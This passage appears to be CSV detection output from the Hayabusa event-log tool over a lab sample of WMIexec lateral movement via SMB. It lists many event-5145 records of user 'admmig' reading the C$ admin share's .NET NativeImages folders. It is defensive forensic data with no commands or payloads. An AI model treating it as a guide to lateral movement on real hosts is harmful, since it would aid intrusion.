+2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.016 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.82d5542b#\af89139de3b87146c705fa989eeaa4b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.031 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.188dd00b#\db42d61826797328b8b368348c6b3f13 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.063 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.1586a486#\9de316f43fe18621a13deefe7dbbbc27 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.078 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.2486c0f5#\5a669ebdf74fb2c8f0d8148b4f79b9a2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.4961ff77#\81722d79b43d0329413516f10c3faf60 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.094 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.dc83ace6#\cd0ef620fc82b9dab224ae428bb2a910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Entity\0023a84796c78827e3d0176900ba5b59 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Mobile\84ecb78e3635883e1cf8acae1dec527e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Routing\aa9b0e256833bf2671e6cb5370559f4f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.Services\fe0f1499df5082fd5392827ddfb03c9e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.109 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind0de890be#\1235ba87f20536f0d0826b2ed514ab19 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.125 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5abb17e9#\928d9b9947cc9afb702c0c2fe2945da7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.150 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind5cb9c182#\55235c007590785b8554cd0c0dc95d36 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:31.182 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Wind74b7bf4b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
